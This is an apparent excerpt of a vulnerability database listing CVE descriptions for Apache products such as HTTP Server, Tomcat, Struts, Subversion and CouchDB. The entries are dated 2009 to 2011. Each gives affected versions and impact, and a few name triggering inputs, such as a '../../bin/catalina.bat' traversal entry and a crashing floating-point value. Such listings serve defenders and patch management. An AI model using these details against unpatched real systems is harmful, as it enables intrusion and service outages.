13222| [CVE-2011-3620] Apache Qpid 0.12 does not properly verify credentials during the joining of a cluster, which allows remote attackers to obtain access to the messaging functionality and job functionality of a cluster by leveraging knowledge of a cluster-username.
13223| [CVE-2011-3607] Integer overflow in the ap_pregsub function in server/util.c in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x through 2.2.21, when the mod_setenvif module is enabled, allows local users to gain privileges via a .htaccess file with a crafted SetEnvIf directive, in conjunction with a crafted HTTP request header, leading to a heap-based buffer overflow.
13224| [CVE-2011-3376] org/apache/catalina/core/DefaultInstanceManager.java in Apache Tomcat 7.x before 7.0.22 does not properly restrict ContainerServlets in the Manager application, which allows local users to gain privileges by using an untrusted web application to access the Manager application's functionality.
13225| [CVE-2011-3375] Apache Tomcat 6.0.30 through 6.0.33 and 7.x before 7.0.22 does not properly perform certain caching and recycling operations involving request objects, which allows remote attackers to obtain unintended read access to IP address and HTTP header information in opportunistic circumstances by reading TCP data.
13226| [CVE-2011-3368] The mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42, 2.0.x through 2.0.64, and 2.2.x through 2.2.21 does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers via a malformed URI containing an initial @ (at sign) character.
13227| [CVE-2011-3348] The mod_proxy_ajp module in the Apache HTTP Server before 2.2.21, when used with mod_proxy_balancer in certain configurations, allows remote attackers to cause a denial of service (temporary "error state" in the backend server) via a malformed HTTP request.
13228| [CVE-2011-3192] The byterange filter in the Apache HTTP Server 1.3.x, 2.0.x through 2.0.64, and 2.2.x through 2.2.19 allows remote attackers to cause a denial of service (memory and CPU consumption) via a Range header that expresses multiple overlapping ranges, as exploited in the wild in August 2011, a different vulnerability than CVE-2007-0086.
13229| [CVE-2011-3190] Certain AJP protocol connector implementations in Apache Tomcat 7.0.0 through 7.0.20, 6.0.0 through 6.0.33, 5.5.0 through 5.5.33, and possibly other versions allow remote attackers to spoof AJP requests, bypass authentication, and obtain sensitive information by causing the connector to interpret a request body as a new request.
13230| [CVE-2011-2729] native/unix/native/jsvc-unix.c in jsvc in the Daemon component 1.0.3 through 1.0.6 in Apache Commons, as used in Apache Tomcat 5.5.32 through 5.5.33, 6.0.30 through 6.0.32, and 7.0.x before 7.0.20 on Linux, does not drop capabilities, which allows remote attackers to bypass read permissions for files via a request to an application.
13231| [CVE-2011-2712] Cross-site scripting (XSS) vulnerability in Apache Wicket 1.4.x before 1.4.18, when setAutomaticMultiWindowSupport is enabled, allows remote attackers to inject arbitrary web script or HTML via unspecified parameters.
13232| [CVE-2011-2688] SQL injection vulnerability in mysql/mysql-auth.pl in the mod_authnz_external module 3.2.5 and earlier for the Apache HTTP Server allows remote attackers to execute arbitrary SQL commands via the user field.
13233| [CVE-2011-2526] Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.19, when sendfile is enabled for the HTTP APR or HTTP NIO connector, does not validate certain request attributes, which allows local users to bypass intended file access restrictions or cause a denial of service (infinite loop or JVM crash) by leveraging an untrusted web application.
13234| [CVE-2011-2516] Off-by-one error in the XML signature feature in Apache XML Security for C++ 1.6.0, as used in Shibboleth before 2.4.3 and possibly other products, allows remote attackers to cause a denial of service (crash) via a signature using a large RSA key, which triggers a buffer overflow.
13235| [CVE-2011-2481] Apache Tomcat 7.0.x before 7.0.17 permits web applications to replace an XML parser used for other web applications, which allows local users to read or modify the (1) web.xml, (2) context.xml, or (3) tld files of arbitrary web applications via a crafted application that is loaded earlier than the target application. NOTE: this vulnerability exists because of a CVE-2009-0783 regression.
13236| [CVE-2011-2329] The rampart_timestamp_token_validate function in util/rampart_timestamp_token.c in Apache Rampart/C 1.3.0 does not properly calculate the expiration of timestamp tokens, which allows remote attackers to bypass intended access restrictions by leveraging an expired token, a different vulnerability than CVE-2011-0730.
13237| [CVE-2011-2204] Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.17, when the MemoryUserDatabase is used, creates log entries containing passwords upon encountering errors in JMX user creation, which allows local users to obtain sensitive information by reading a log file.
13238| [CVE-2011-2088] XWork 2.2.1 in Apache Struts 2.2.1, and OpenSymphony XWork in OpenSymphony WebWork, allows remote attackers to obtain potentially sensitive information about internal Java class paths via vectors involving an s:submit element and a nonexistent method, a different vulnerability than CVE-2011-1772.3.
13239| [CVE-2011-2087] Multiple cross-site scripting (XSS) vulnerabilities in component handlers in the javatemplates (aka Java Templates) plugin in Apache Struts 2.x before 2.2.3 allow remote attackers to inject arbitrary web script or HTML via an arbitrary parameter value to a .action URI, related to improper handling of value attributes in (1) FileHandler.java, (2) HiddenHandler.java, (3) PasswordHandler.java, (4) RadioHandler.java, (5) ResetHandler.java, (6) SelectHandler.java, (7) SubmitHandler.java, and (8) TextFieldHandler.java.
13240| [CVE-2011-1928] The fnmatch implementation in apr_fnmatch.c in the Apache Portable Runtime (APR) library 1.4.3 and 1.4.4, and the Apache HTTP Server 2.2.18, allows remote attackers to cause a denial of service (infinite loop) via a URI that does not match unspecified types of wildcard patterns, as demonstrated by attacks against mod_autoindex in httpd when a /*/WEB-INF/ configuration pattern is used. NOTE: this issue exists because of an incorrect fix for CVE-2011-0419.
13241| [CVE-2011-1921] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion 1.5.x and 1.6.x before 1.6.17, when the SVNPathAuthz short_circuit option is disabled, does not properly enforce permissions for files that had been publicly readable in the past, which allows remote attackers to obtain sensitive information via a replay REPORT operation.
13242| [CVE-2011-1783] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion 1.5.x and 1.6.x before 1.6.17, when the SVNPathAuthz short_circuit option is enabled, allows remote attackers to cause a denial of service (infinite loop and memory consumption) in opportunistic circumstances by requesting data.
13243| [CVE-2011-1772] Multiple cross-site scripting (XSS) vulnerabilities in XWork in Apache Struts 2.x before 2.2.3, and OpenSymphony XWork in OpenSymphony WebWork, allow remote attackers to inject arbitrary web script or HTML via vectors involving (1) an action name, (2) the action attribute of an s:submit element, or (3) the method attribute of an s:submit element.
13244| [CVE-2011-1752] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion before 1.6.17, allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a request for a baselined WebDAV resource, as exploited in the wild in May 2011.
13245| [CVE-2011-1610] Multiple SQL injection vulnerabilities in xmldirectorylist.jsp in the embedded Apache HTTP Server component in Cisco Unified Communications Manager (aka CUCM, formerly CallManager) 6.x before 6.1(5)su3, 7.x before 7.1(5)su4, 8.0 before 8.0(3a)su2, and 8.5 before 8.5(1)su1 allow remote attackers to execute arbitrary SQL commands via the (1) f, (2) l, or (3) n parameter, aka Bug ID CSCtj42064.
13246| [CVE-2011-1582] Apache Tomcat 7.0.12 and 7.0.13 processes the first request to a servlet without following security constraints that have been configured through annotations, which allows remote attackers to bypass intended access restrictions via HTTP requests. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-1088, CVE-2011-1183, and CVE-2011-1419.
13247| [CVE-2011-1571] Unspecified vulnerability in the XSL Content portlet in Liferay Portal Community Edition (CE) 5.x and 6.x before 6.0.6 GA, when Apache Tomcat is used, allows remote attackers to execute arbitrary commands via unknown vectors.
13248| [CVE-2011-1570] Cross-site scripting (XSS) vulnerability in Liferay Portal Community Edition (CE) 6.x before 6.0.6 GA, when Apache Tomcat is used, allows remote authenticated users to inject arbitrary web script or HTML via a message title, a different vulnerability than CVE-2004-2030.
13249| [CVE-2011-1503] The XSL Content portlet in Liferay Portal Community Edition (CE) 5.x and 6.x before 6.0.6 GA, when Apache Tomcat or Oracle GlassFish is used, allows remote authenticated users to read arbitrary (1) XSL and (2) XML files via a file:/// URL.
13250| [CVE-2011-1502] Liferay Portal Community Edition (CE) 6.x before 6.0.6 GA, when Apache Tomcat is used, allows remote authenticated users to read arbitrary files via an entity declaration in conjunction with an entity reference, related to an XML External Entity (aka XXE) issue.
13251| [CVE-2011-1498] Apache HttpClient 4.x before 4.1.1 in Apache HttpComponents, when used with an authenticating proxy server, sends the Proxy-Authorization header to the origin server, which allows remote web servers to obtain sensitive information by logging this header.
13252| [CVE-2011-1475] The HTTP BIO connector in Apache Tomcat 7.0.x before 7.0.12 does not properly handle HTTP pipelining, which allows remote attackers to read responses intended for other clients in opportunistic circumstances by examining the application data in HTTP packets, related to "a mix-up of responses for requests from different users."
13253| [CVE-2011-1419] Apache Tomcat 7.x before 7.0.11, when web.xml has no security constraints, does not follow ServletSecurity annotations, which allows remote attackers to bypass intended access restrictions via HTTP requests to a web application. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-1088.
13254| [CVE-2011-1318] Memory leak in org.apache.jasper.runtime.JspWriterImpl.response in the JavaServer Pages (JSP) component in IBM WebSphere Application Server (WAS) before 7.0.0.15 allows remote attackers to cause a denial of service (memory consumption) by accessing a JSP page of an application that is repeatedly stopped and restarted.
13255| [CVE-2011-1184] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 does not have the expected countermeasures against replay attacks, which makes it easier for remote attackers to bypass intended access restrictions by sniffing the network for valid requests, related to lack of checking of nonce (aka server nonce) and nc (aka nonce-count or client nonce count) values.
13256| [CVE-2011-1183] Apache Tomcat 7.0.11, when web.xml has no login configuration, does not follow security constraints, which allows remote attackers to bypass intended access restrictions via HTTP requests to a meta-data complete web application. NOTE: this vulnerability exists because of an incorrect fix for CVE-2011-1088 and CVE-2011-1419.
13257| [CVE-2011-1176] The configuration merger in itk.c in the Steinar H. Gunderson mpm-itk Multi-Processing Module 2.2.11-01 and 2.2.11-02 for the Apache HTTP Server does not properly handle certain configuration sections that specify NiceValue but not AssignUserID, which might allow remote attackers to gain privileges by leveraging the root uid and root gid of an mpm-itk process.
13258| [CVE-2011-1088] Apache Tomcat 7.x before 7.0.10 does not follow ServletSecurity annotations, which allows remote attackers to bypass intended access restrictions via HTTP requests to a web application.
13259| [CVE-2011-1077] Multiple cross-site scripting (XSS) vulnerabilities in Apache Archiva 1.0 through 1.2.2, and 1.3.x before 1.3.5, allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
13260| [CVE-2011-1026] Multiple cross-site request forgery (CSRF) vulnerabilities in Apache Archiva 1.0 through 1.2.2, and 1.3.x before 1.3.5, allow remote attackers to hijack the authentication of administrators.
13261| [CVE-2011-0715] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion before 1.6.16, allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a request that contains a lock token.
13262| [CVE-2011-0534] Apache Tomcat 7.0.0 through 7.0.6 and 6.0.0 through 6.0.30 does not enforce the maxHttpHeaderSize limit for requests involving the NIO HTTP connector, which allows remote attackers to cause a denial of service (OutOfMemoryError) via a crafted request.
13263| [CVE-2011-0533] Cross-site scripting (XSS) vulnerability in Apache Continuum 1.1 through 1.2.3.1, 1.3.6, and 1.4.0 Beta
13264| [CVE-2011-0419] Stack consumption vulnerability in the fnmatch implementation in apr_fnmatch.c in the Apache Portable Runtime (APR) library before 1.4.3 and the Apache HTTP Server before 2.2.18, and in fnmatch.c in libc in NetBSD 5.1, OpenBSD 4.8, FreeBSD, Apple Mac OS X 10.6, Oracle Solaris 10, and Android, allows context-dependent attackers to cause a denial of service (CPU and memory consumption) via *? sequences in the first argument, as demonstrated by attacks against mod_autoindex in httpd.
13265| [CVE-2011-0013] Multiple cross-site scripting (XSS) vulnerabilities in the HTML Manager Interface in Apache Tomcat 5.5 before 5.5.32, 6.0 before 6.0.30, and 7.0 before 7.0.6 allow remote attackers to inject arbitrary web script or HTML, as demonstrated via the display-name tag.
13266| [CVE-2010-4644] Multiple memory leaks in rev_hunt.c in Apache Subversion before 1.6.15 allow remote authenticated users to cause a denial of service (memory consumption and daemon crash) via the -g option to the blame command.
13267| [CVE-2010-4539] The walk function in repos.c in the mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion before 1.6.15, allows remote authenticated users to cause a denial of service (NULL pointer dereference and daemon crash) via vectors that trigger the walking of SVNParentPath collections.
13268| [CVE-2010-4476] The Double.parseDouble method in Java Runtime Environment (JRE) in Oracle Java SE and Java for Business 6 Update 23 and earlier, 5.0 Update 27 and earlier, and 1.4.2_29 and earlier, as used in OpenJDK, Apache, JBossweb, and other products, allows remote attackers to cause a denial of service via a crafted string that triggers an infinite loop of estimations during conversion to a double-precision binary floating-point number, as demonstrated using 2.2250738585072012e-308.
13269| [CVE-2010-4455] Unspecified vulnerability in the Oracle HTTP Server component in Oracle Fusion Middleware 11.1.1.2 and 11.1.1.3 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Apache Plugin.
13270| [CVE-2010-4408] Apache Archiva 1.0 through 1.0.3, 1.1 through 1.1.4, 1.2 through 1.2.2, and 1.3 through 1.3.1 does not require entry of the administrator's password at the time of modifying a user account, which makes it easier for context-dependent attackers to gain privileges by leveraging a (1) unattended workstation or (2) cross-site request forgery (CSRF) vulnerability, a related issue to CVE-2010-3449.
13271| [CVE-2010-4312] The default configuration of Apache Tomcat 6.x does not include the HTTPOnly flag in a Set-Cookie header, which makes it easier for remote attackers to hijack a session via script access to a cookie.
13272| [CVE-2010-4172] Multiple cross-site scripting (XSS) vulnerabilities in the Manager application in Apache Tomcat 6.0.12 through 6.0.29 and 7.0.0 through 7.0.4 allow remote attackers to inject arbitrary web script or HTML via the (1) orderBy or (2) sort parameter to sessionsList.jsp, or unspecified input to (3) sessionDetail.jsp or (4) java/org/apache/catalina/manager/JspHelper.java, related to use of untrusted web applications.
13273| [CVE-2010-3872] The fcgid_header_bucket_read function in fcgid_bucket.c in the mod_fcgid module before 2.3.6 for the Apache HTTP Server does not use bytewise pointer arithmetic in certain circumstances, which has unspecified impact and attack vectors related to "untrusted FastCGI applications" and a "stack buffer overwrite."
13274| [CVE-2010-3863] Apache Shiro before 1.1.0, and JSecurity 0.9.x, does not canonicalize URI paths before comparing them to entries in the shiro.ini file, which allows remote attackers to bypass intended access restrictions via a crafted request, as demonstrated by the /./account/index.jsp URI.
13275| [CVE-2010-3854] Multiple cross-site scripting (XSS) vulnerabilities in the web administration interface (aka Futon) in Apache CouchDB 0.8.0 through 1.0.1 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
13276| [CVE-2010-3718] Apache Tomcat 7.0.0 through 7.0.3, 6.0.x, and 5.5.x, when running within a SecurityManager, does not make the ServletContext attribute read-only, which allows local web applications to read or write files outside of the intended working directory, as demonstrated using a directory traversal attack.
13277| [CVE-2010-3449] Cross-site request forgery (CSRF) vulnerability in Redback before 1.2.4, as used in Apache Archiva 1.0 through 1.0.3, 1.1 through 1.1.4, 1.2 through 1.2.2, and 1.3 through 1.3.1
13278| [CVE-2010-3315] authz.c in the mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion 1.5.x before 1.5.8 and 1.6.x before 1.6.13, when SVNPathAuthz short_circuit is enabled, does not properly handle a named repository as a rule scope, which allows remote authenticated users to bypass intended access restrictions via svn commands.
13279| [CVE-2010-3083] sys/ssl/SslSocket.cpp in qpidd in Apache Qpid, as used in Red Hat Enterprise MRG before 1.2.2 and other products, when SSL is enabled, allows remote attackers to cause a denial of service (daemon outage) by connecting to the SSL port but not participating in an SSL handshake.
13280| [CVE-2010-2952] Apache Traffic Server before 2.0.1, and 2.1.x before 2.1.2-unstable, does not properly choose DNS source ports and transaction IDs, and does not properly use DNS query fields to validate responses, which makes it easier for man-in-the-middle attackers to poison the internal DNS cache via a crafted response.
13281| [CVE-2010-2791] mod_proxy in httpd in Apache HTTP Server 2.2.9, when running on Unix, does not close the backend connection if a timeout occurs when reading a response from a persistent connection, which allows remote attackers to obtain a potentially sensitive response intended for a different client in opportunistic circumstances via a normal HTTP request. NOTE: this is the same issue as CVE-2010-2068, but for a different OS and set of affected versions.
13282| [CVE-2010-2375] Package/Privilege: Plugins for Apache, Sun and IIS web servers Unspecified vulnerability in the WebLogic Server component in Oracle Fusion Middleware 7.0 SP7, 8.1 SP6, 9.0, 9.1, 9.2 MP3, 10.0 MP2, 10.3.2, and 10.3.3 allows remote attackers to affect confidentiality and integrity, related to IIS.
13283| [CVE-2010-2234] Cross-site request forgery (CSRF) vulnerability in Apache CouchDB 0.8.0 through 0.11.0 allows remote attackers to hijack the authentication of administrators for direct requests to an installation URL.
13284| [CVE-2010-2227] Apache Tomcat 5.5.0 through 5.5.29, 6.0.0 through 6.0.27, and 7.0.0 beta does not properly handle an invalid Transfer-Encoding header, which allows remote attackers to cause a denial of service (application outage) or obtain sensitive information via a crafted header that interferes with "recycling of a buffer."
13285| [CVE-2010-2103] Cross-site scripting (XSS) vulnerability in axis2-admin/axis2-admin/engagingglobally in the administration console in Apache Axis2/Java 1.4.1, 1.5.1, and possibly other versions, as used in SAP Business Objects 12, 3com IMC, and possibly other products, allows remote attackers to inject arbitrary web script or HTML via the modules parameter. NOTE: some of these details are obtained from third party information.
13286| [CVE-2010-2086] Apache MyFaces 1.1.7 and 1.2.8, as used in IBM WebSphere Application Server and other applications, does not properly handle an unencrypted view state, which allows remote attackers to conduct cross-site scripting (XSS) attacks or execute arbitrary Expression Language (EL) statements via vectors that involve modifying the serialized view object.
13287| [CVE-2010-2076] Apache CXF 2.0.x before 2.0.13, 2.1.x before 2.1.10, and 2.2.x before 2.2.9, as used in Apache ServiceMix, Apache Camel, Apache Chemistry, Apache jUDDI, Apache Geronimo, and other products, does not properly reject DTDs in SOAP messages, which allows remote attackers to read arbitrary files, send HTTP requests to intranet servers, or cause a denial of service (CPU and memory consumption) via a crafted DTD, as demonstrated by an entity declaration in a request to samples/wsdl_first_pure_xml, a similar issue to CVE-2010-1632.
13288| [CVE-2010-2068] mod_proxy_http.c in mod_proxy_http in the Apache HTTP Server 2.2.9 through 2.2.15, 2.3.4-alpha, and 2.3.5-alpha on Windows, NetWare, and OS/2, in certain configurations involving proxy worker pools, does not properly detect timeouts, which allows remote attackers to obtain a potentially sensitive response intended for a different client in opportunistic circumstances via a normal HTTP request.
13289| [CVE-2010-2057] shared/util/StateUtils.java in Apache MyFaces 1.1.x before 1.1.8, 1.2.x before 1.2.9, and 2.0.x before 2.0.1 uses an encrypted View State without a Message Authentication Code (MAC), which makes it easier for remote attackers to perform successful modifications of the View State via a padding oracle attack.
13290| [CVE-2010-1632] Apache Axis2 before 1.5.2, as used in IBM WebSphere Application Server (WAS) 7.0 through 7.0.0.12, IBM Feature Pack for Web Services 6.1.0.9 through 6.1.0.32, IBM Feature Pack for Web 2.0 1.0.1.0, Apache Synapse, Apache ODE, Apache Tuscany, Apache Geronimo, and other products, does not properly reject DTDs in SOAP messages, which allows remote attackers to read arbitrary files, send HTTP requests to intranet servers, or cause a denial of service (CPU and memory consumption) via a crafted DTD, as demonstrated by an entity declaration in a request to the Synapse SimpleStockQuoteService.
13291| [CVE-2010-1623] Memory leak in the apr_brigade_split_line function in buckets/apr_brigade.c in the Apache Portable Runtime Utility library (aka APR-util) before 1.3.10, as used in the mod_reqtimeout module in the Apache HTTP Server and other software, allows remote attackers to cause a denial of service (memory consumption) via unspecified vectors related to the destruction of an APR bucket.
13292| [CVE-2010-1587] The Jetty ResourceHandler in Apache ActiveMQ 5.x before 5.3.2 and 5.4.x before 5.4.0 allows remote attackers to read JSP source code via a // (slash slash) initial substring in a URI for (1) admin/index.jsp, (2) admin/queues.jsp, or (3) admin/topics.jsp.
13293| [CVE-2010-1452] The (1) mod_cache and (2) mod_dav modules in the Apache HTTP Server 2.2.x before 2.2.16 allow remote attackers to cause a denial of service (process crash) via a request that lacks a path.
13294| [CVE-2010-1325] Cross-site request forgery (CSRF) vulnerability in the apache2-slms package in SUSE Lifecycle Management Server (SLMS) 1.0 on SUSE Linux Enterprise (SLE) 11 allows remote attackers to hijack the authentication of unspecified victims via vectors related to improper parameter quoting. NOTE: some sources report that this is a vulnerability in a product named "Apache SLMS," but that is incorrect.
13295| [CVE-2010-1244] Cross-site request forgery (CSRF) vulnerability in createDestination.action in Apache ActiveMQ before 5.3.1 allows remote attackers to hijack the authentication of unspecified victims for requests that create queues via the JMSDestination parameter in a queue action.
13296| [CVE-2010-1157] Apache Tomcat 5.5.0 through 5.5.29 and 6.0.0 through 6.0.26 might allow remote attackers to discover the server's hostname or IP address by sending a request for a resource that requires (1) BASIC or (2) DIGEST authentication, and then reading the realm field in the WWW-Authenticate header in the reply.
13297| [CVE-2010-1151] Race condition in the mod_auth_shadow module for the Apache HTTP Server allows remote attackers to bypass authentication, and read and possibly modify data, via vectors related to improper interaction with an external helper application for validation of credentials.
13298| [CVE-2010-0684] Cross-site scripting (XSS) vulnerability in createDestination.action in Apache ActiveMQ before 5.3.1 allows remote authenticated users to inject arbitrary web script or HTML via the JMSDestination parameter in a queue action.
13299| [CVE-2010-0434] The ap_read_request function in server/protocol.c in the Apache HTTP Server 2.2.x before 2.2.15, when a multithreaded MPM is used, does not properly handle headers in subrequests in certain circumstances involving a parent request that has a body, which might allow remote attackers to obtain sensitive information via a crafted request that triggers access to memory locations associated with an earlier request.
13300| [CVE-2010-0432] Multiple cross-site scripting (XSS) vulnerabilities in the Apache Open For Business Project (aka OFBiz) 09.04 and earlier, as used in Opentaps, Neogia, and Entente Oya, allow remote attackers to inject arbitrary web script or HTML via (1) the productStoreId parameter to control/exportProductListing, (2) the partyId parameter to partymgr/control/viewprofile (aka partymgr/control/login), (3) the start parameter to myportal/control/showPortalPage, (4) an invalid URI beginning with /facility/control/ReceiveReturn (aka /crmsfa/control/ReceiveReturn or /cms/control/ReceiveReturn), (5) the contentId parameter (aka the entityName variable) to ecommerce/control/ViewBlogArticle, (6) the entityName parameter to webtools/control/FindGeneric, or the (7) subject or (8) content parameter to an unspecified component under ecommerce/control/contactus.
13301| [CVE-2010-0425] modules/arch/win32/mod_isapi.c in mod_isapi in the Apache HTTP Server 2.0.37 through 2.0.63, 2.2.0 through 2.2.14, and 2.3.x before 2.3.7, when running on Windows, does not ensure that request processing is complete before calling isapi_unload for an ISAPI .dll module, which allows remote attackers to execute arbitrary code via unspecified vectors related to a crafted request, a reset packet, and "orphaned callback pointers."
13302| [CVE-2010-0408] The ap_proxy_ajp_request function in mod_proxy_ajp.c in mod_proxy_ajp in the Apache HTTP Server 2.2.x before 2.2.15 does not properly handle certain situations in which a client sends no request body, which allows remote attackers to cause a denial of service (backend server outage) via a crafted request, related to use of a 500 error code instead of the appropriate 400 error code.
13303| [CVE-2010-0390] Unrestricted file upload vulnerability in maxImageUpload/index.php in PHP F1 Max's Image Uploader 1.0, when Apache is not configured to handle the mime-type for files with pjpeg or jpeg extensions, allows remote attackers to execute arbitrary code by uploading a file with a pjpeg or jpeg extension, then accessing it via a direct request to the file in original/. NOTE: some of these details are obtained from third party information.
13304| [CVE-2010-0219] Apache Axis2, as used in dswsbobje.war in SAP BusinessObjects Enterprise XI 3.2, CA ARCserve D2D r15, and other products, has a default password of axis2 for the admin account, which makes it easier for remote attackers to execute arbitrary code by uploading a crafted web service.
13305| [CVE-2010-0010] Integer overflow in the ap_proxy_send_fb function in proxy/proxy_util.c in mod_proxy in the Apache HTTP Server before 1.3.42 on 64-bit platforms allows remote origin servers to cause a denial of service (daemon crash) or possibly execute arbitrary code via a large chunk size that triggers a heap-based buffer overflow.
13306| [CVE-2010-0009] Apache CouchDB 0.8.0 through 0.10.1 allows remote attackers to obtain sensitive information by measuring the completion time of operations that verify (1) hashes or (2) passwords.
13307| [CVE-2009-5120] The default configuration of Apache Tomcat in Websense Manager in Websense Web Security 7.0 and Web Filter 7.0 allows connections to TCP port 1812 from arbitrary source IP addresses, which makes it easier for remote attackers to conduct cross-site scripting (XSS) attacks via UTF-7 text to the 404 error page of a Project Woodstock service on this port.
13308| [CVE-2009-5119] The default configuration of Apache Tomcat in Websense Manager in Websense Web Security 7.0 and Web Filter 7.0 enables weak SSL ciphers in conf/server.xml, which makes it easier for remote attackers to obtain sensitive information by sniffing the network and then conducting a brute-force attack against encrypted session data.
13309| [CVE-2009-5006] The SessionAdapter::ExchangeHandlerImpl::checkAlternate function in broker/SessionAdapter.cpp in the C++ Broker component in Apache Qpid before 0.6, as used in Red Hat Enterprise MRG before 1.3 and other products, allows remote authenticated users to cause a denial of service (NULL pointer dereference, daemon crash, and cluster outage) by attempting to modify the alternate of an exchange.
13310| [CVE-2009-5005] The Cluster::deliveredEvent function in cluster/Cluster.cpp in Apache Qpid, as used in Red Hat Enterprise MRG before 1.3 and other products, allows remote attackers to cause a denial of service (daemon crash and cluster outage) via invalid AMQP data.
13311| [CVE-2009-4355] Memory leak in the zlib_stateful_finish function in crypto/comp/c_zlib.c in OpenSSL 0.9.8l and earlier and 1.0.0 Beta through Beta 4 allows remote attackers to cause a denial of service (memory consumption) via vectors that trigger incorrect calls to the CRYPTO_cleanup_all_ex_data function, as demonstrated by use of SSLv3 and PHP with the Apache HTTP Server, a related issue to CVE-2008-1678.
13312| [CVE-2009-4269] The password hash generation algorithm in the BUILTIN authentication functionality for Apache Derby before 10.6.1.0 performs a transformation that reduces the size of the set of inputs to SHA-1, which produces a small search space that makes it easier for local and possibly remote attackers to crack passwords by generating hash collisions, related to password substitution.
13313| [CVE-2009-3923] The VirtualBox 2.0.8 and 2.0.10 web service in Sun Virtual Desktop Infrastructure (VDI) 3.0 does not require authentication, which allows remote attackers to obtain unspecified access via vectors involving requests to an Apache HTTP Server.
13314| [CVE-2009-3890] Unrestricted file upload vulnerability in the wp_check_filetype function in wp-includes/functions.php in WordPress before 2.8.6, when a certain configuration of the mod_mime module in the Apache HTTP Server is enabled, allows remote authenticated users to execute arbitrary code by posting an attachment with a multiple-extension filename, and then accessing this attachment via a direct request to a wp-content/uploads/ pathname, as demonstrated by a .php.jpg filename.
13315| [CVE-2009-3843] HP Operations Manager 8.10 on Windows contains a "hidden account" in the XML file that specifies Tomcat users, which allows remote attackers to conduct unrestricted file upload attacks, and thereby execute arbitrary code, by using the org.apache.catalina.manager.HTMLManagerServlet class to make requests to manager/html/upload.
13316| [CVE-2009-3821] Cross-site scripting (XSS) vulnerability in the Apache Solr Search (solr) extension 1.0.0 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
13317| [CVE-2009-3555] The TLS protocol, and the SSL protocol 3.0 and possibly earlier, as used in Microsoft Internet Information Services (IIS) 7.0, mod_ssl in the Apache HTTP Server 2.2.14 and earlier, OpenSSL before 0.9.8l, GnuTLS 2.8.5 and earlier, Mozilla Network Security Services (NSS) 3.12.4 and earlier, multiple Cisco products, and other products, does not properly associate renegotiation handshakes with an existing connection, which allows man-in-the-middle attackers to insert data into HTTPS sessions, and possibly other types of sessions protected by TLS or SSL, by sending an unauthenticated request that is processed retroactively by a server in a post-renegotiation context, related to a "plaintext injection" attack, aka the "Project Mogul" issue.
13318| [CVE-2009-3548] The Windows installer for Apache Tomcat 6.0.0 through 6.0.20, 5.5.0 through 5.5.28, and possibly earlier versions uses a blank default password for the administrative user, which allows remote attackers to gain privileges.
13319| [CVE-2009-3250] The saveForwardAttachments procedure in the Compose Mail functionality in vtiger CRM 5.0.4 allows remote authenticated users to execute arbitrary code by composing an e-mail message with an attachment filename ending in (1) .php in installations based on certain Apache HTTP Server configurations, (2) .php. on Windows, or (3) .php/ on Linux, and then making a direct request to a certain pathname under storage/.
13320| [CVE-2009-3095] The mod_proxy_ftp module in the Apache HTTP Server allows remote attackers to bypass intended access restrictions and send arbitrary commands to an FTP server via vectors related to the embedding of these commands in the Authorization HTTP header, as demonstrated by a certain module in VulnDisco Pack Professional 8.11.
13321| [CVE-2009-3094] The ap_proxy_ftp_handler function in modules/proxy/proxy_ftp.c in the mod_proxy_ftp module in the Apache HTTP Server 2.0.63 and 2.2.13 allows remote FTP servers to cause a denial of service (NULL pointer dereference and child process crash) via a malformed reply to an EPSV command.
13322| [CVE-2009-2902] Directory traversal vulnerability in Apache Tomcat 5.5.0 through 5.5.28 and 6.0.0 through 6.0.20 allows remote attackers to delete work-directory files via directory traversal sequences in a WAR filename, as demonstrated by the ...war filename.
13323| [CVE-2009-2901] The autodeployment process in Apache Tomcat 5.5.0 through 5.5.28 and 6.0.0 through 6.0.20, when autoDeploy is enabled, deploys appBase files that remain from a failed undeploy, which might allow remote attackers to bypass intended authentication requirements via HTTP requests.
13324| [CVE-2009-2823] The Apache HTTP Server in Apple Mac OS X before 10.6.2 enables the HTTP TRACE method, which allows remote attackers to conduct cross-site scripting (XSS) attacks via unspecified web client software.
13325| [CVE-2009-2699] The Solaris pollset feature in the Event Port backend in poll/unix/port.c in the Apache Portable Runtime (APR) library before 1.3.9, as used in the Apache HTTP Server before 2.2.14 and other products, does not properly handle errors, which allows remote attackers to cause a denial of service (daemon hang) via unspecified HTTP requests, related to the prefork and event MPMs.
13326| [CVE-2009-2696] Cross-site scripting (XSS) vulnerability in jsp/cal/cal2.jsp in the calendar application in the examples web application in Apache Tomcat on Red Hat Enterprise Linux 5, Desktop Workstation 5, and Linux Desktop 5 allows remote attackers to inject arbitrary web script or HTML via the time parameter, related to "invalid HTML." NOTE: this is due to a missing fix for CVE-2009-0781.
13327| [CVE-2009-2693] Directory traversal vulnerability in Apache Tomcat 5.5.0 through 5.5.28 and 6.0.0 through 6.0.20 allows remote attackers to create or overwrite arbitrary files via a .. (dot dot) in an entry in a WAR file, as demonstrated by a ../../bin/catalina.bat entry.
13328| [CVE-2009-2625] XMLScanner.java in Apache Xerces2 Java, as used in Sun Java Runtime Environment (JRE) in JDK and JRE 6 before Update 15 and JDK and JRE 5.0 before Update 20, and in other products, allows remote attackers to cause a denial of service (infinite loop and application hang) via malformed XML input, as demonstrated by the Codenomicon XML fuzzing framework.
